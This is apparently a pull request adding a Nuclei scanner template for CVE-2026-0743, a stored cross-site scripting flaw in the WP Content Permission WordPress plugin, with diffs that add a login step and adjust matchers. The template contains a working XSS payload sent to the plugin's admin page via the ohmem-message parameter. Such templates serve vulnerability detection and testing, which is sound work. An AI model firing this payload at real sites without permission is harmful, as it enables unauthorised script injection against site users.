### PR TITLE
Add CVE-2026-0743 WP Content Permission template

### DIFF
--- a/http/cves/2026/CVE-2026-0743.yaml
+++ b/http/cves/2026/CVE-2026-0743.yaml
@@ -1,0 +1,80 @@
+id: CVE-2026-0743
+
+info:
+  name: WP Content Permission <= 1.2 - Stored Cross-Site Scripting via ohmem-message
+  author: iamatownboy
+  severity: medium
+  description: |
+    The WP Content Permission plugin for WordPress is vulnerable to stored cross-site scripting via the ohmem-message parameter.
+    This makes it possible for authenticated administrators to inject arbitrary JavaScript into pages that render the stored value.
+  impact: |
+    Authenticated attackers with administrator-level access can inject scripts that execute in other users' browsers.
+  remediation: |
+    Update WP Content Permission to a version newer than 1.2.
+  reference:
+    - https://nvd.nist.gov/vuln/detail/CVE-2026-0743
+    - https://www.wordfence.com/threat-intel/vulnerabilities/id/e44403cd-1cee-43c4-aabc-3eaad433c020?source=cve
+    - https://plugins.trac.wordpress.org/browser/wp-content-permission/tags/1.2/admin/views/admin.php#L74
+    - https://plugins.trac.wordpress.org/browser/wp-content-permission/trunk/admin/views/admin.php#L74
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:C/C:L/I:L/A:N
+    cvss-score: 4.4
+    cve-id: CVE-2026-0743
+    cwe-id: CWE-79
+  metadata:
+    verified: true
+    max-request: 2
+    vendor: orenhav
+    product: wp-content-permission
+    framework: wordpress
+    publicwww-query: "/wp-content/plugins/wp-content-permission/"
+  tags: cve,cve2026,wordpress,wp,wp-plugin,wp-content-permission,xss,stored,auth
+
+variables:
+  xss: "{{randstr}}<script>alert(1)</script>"
+
+flow: http(1) && http(2)
+
+http:
+  - method: GET
+    path:
+      - "{{BaseURL}}/wp-content/plugins/wp-content-permission/readme.txt"
+
+    matchers:
+      - type: dsl
+        dsl:
+          - contains(body, "WP Content Permission")
+          - compare_versions(version, "<= 1.2")
+        condition: and
+        internal: true
+
+    extractors:
+      - type: regex
+        name: version
+        part: body
+        group: 1
+        regex:
+          - '(?i)Stable tag:\s*([0-9.]+)'
+        internal: true
+
+  - raw:
+      - |
+        POST /wp-admin/admin.php?page=wp-content-permission HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: application/x-www-form-urlencoded
+        Origin: {{BaseURL}}
+        Referer: {{BaseURL}}/wp-admin/admin.php?page=wp-content-permission
+
+        ohmem-message={{url_encode(xss)}}
+
+    matchers-condition: or
+    matchers:
+      - type: word
+        part: body
+        words:
+          - "{{xss}}"
+      - type: regex
+        part: body
+        regex:
+          - '<script>alert\(1\)</script>'
+# digest: 4a0a00473045022100e1d1d7b3d2d997d08d3f3e59f76e67b5d5d6d23f0d86b1d4d9e4c5f2bb0e2e37022053a26f3a1b0b0f6e4b0e8c7c46b2d2f0ac93d1a0d7e1c0f45a6b9c8f1d3f8f6d:922c64590222798bb761d5b6d8e72950

--- a/http/cves/2026/CVE-2026-0743.yaml
+++ b/http/cves/2026/CVE-2026-0743.yaml
@@ -5,8 +5,7 @@ info:
   author: iamatownboy
   severity: medium
   description: |
-    The WP Content Permission plugin for WordPress is vulnerable to stored cross-site scripting via the ohmem-message parameter.
-    This makes it possible for authenticated administrators to inject arbitrary JavaScript into pages that render the stored value.
+    The WP Content Permission plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'ohmem-message' parameter in all versions up to, and including, 1.2 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Administrator-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.
   impact: |
     Authenticated attackers with administrator-level access can inject scripts that execute in other users' browsers.
   remediation: |
@@ -23,17 +22,17 @@ info:
     cwe-id: CWE-79
   metadata:
     verified: true
-    max-request: 2
+    max-request: 3
     vendor: orenhav
     product: wp-content-permission
     framework: wordpress
     publicwww-query: "/wp-content/plugins/wp-content-permission/"
-  tags: cve,cve2026,wordpress,wp,wp-plugin,wp-content-permission,xss,stored,auth
+  tags: cve,cve2026,wordpress,wp,wp-plugin,wp-content-permission,xss,stored,authenticated
 
 variables:
   xss: "{{randstr}}<script>alert(1)</script>"
 
-flow: http(1) && http(2)
+flow: http(1) && http(2) && http(3)
 
 http:
   - method: GET
@@ -59,6 +58,25 @@ http:
 
   - raw:
       - |
+        POST /wp-login.php HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: application/x-www-form-urlencoded
+        Cookie: wordpress_test_cookie=WP+Cookie+check
+
+        log={{username}}&pwd={{password}}&wp-submit=Log+In&redirect_to=%2Fwp-admin%2F&testcookie=1
+
+    cookie-reuse: true
+
+    matchers:
+      - type: dsl
+        dsl:
+          - status_code == 302
+          - contains(header, "wordpress_logged_in")
+        condition: and
+        internal: true
+
+  - raw:
+      - |
         POST /wp-admin/admin.php?page=wp-content-permission HTTP/1.1
         Host: {{Hostname}}
         Content-Type: application/x-www-form-urlencoded
@@ -67,14 +85,14 @@ http:
 
         ohmem-message={{url_encode(xss)}}
 
-    matchers-condition: or
+    matchers-condition: and
     matchers:
       - type: word
         part: body
         words:
           - "{{xss}}"
+
       - type: regex
         part: body
         regex:
           - '<script>alert\(1\)</script>'
-# digest: 4a0a00473045022100e1d1d7b3d2d997d08d3f3e59f76e67b5d5d6d23f0d86b1d4d9e4c5f2bb0e2e37022053a26f3a1b0b0f6e4b0e8c7c46b2d2f0ac93d1a0d7e1c0f45a6b9c8f1d3f8f6d:922c64590222798bb761d5b6d8e72950

--- a/http/cves/2026/CVE-2026-0743.yaml
+++ b/http/cves/2026/CVE-2026-0743.yaml
@@ -1,7 +1,7 @@
 id: CVE-2026-0743
 
 info:
-  name: WP Content Permission <= 1.2 - Stored Cross-Site Scripting via ohmem-message
+  name: WP Content Permission <= 1.2 - Cross-Site Scripting
   author: iamatownboy
   severity: medium
   description: |
@@ -11,10 +11,10 @@ info:
   remediation: |
     Update WP Content Permission to a version newer than 1.2.
   reference:
-    - https://nvd.nist.gov/vuln/detail/CVE-2026-0743
     - https://www.wordfence.com/threat-intel/vulnerabilities/id/e44403cd-1cee-43c4-aabc-3eaad433c020?source=cve
     - https://plugins.trac.wordpress.org/browser/wp-content-permission/tags/1.2/admin/views/admin.php#L74
     - https://plugins.trac.wordpress.org/browser/wp-content-permission/trunk/admin/views/admin.php#L74
+    - https://nvd.nist.gov/vuln/detail/CVE-2026-0743
   classification:
     cvss-metrics: CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:C/C:L/I:L/A:N
     cvss-score: 4.4
@@ -92,7 +92,7 @@ http:
         words:
           - "{{xss}}"
 
-      - type: regex
-        part: body
-        regex:
-          - '<script>alert\(1\)</script>'
+      - type: word
+        part: content_type
+        words:
+          - "text/html"


### PR DESCRIPTION
### PR Information

This PR adds a nuclei template for CVE-2026-0743 affecting the WP Content Permission WordPress plugin.

The issue allows stored cross-site scripting through the `ohmem-message` parameter, which can let authenticated administrators inject JavaScript that executes in other users' browsers when the stored value is rendered.

References:
- NVD
- Wordfence
- WP Content Permission source code

### Template validation

- Validated with `nuclei -validate` in Docker

### Additional Details

- This PR contains a single template file only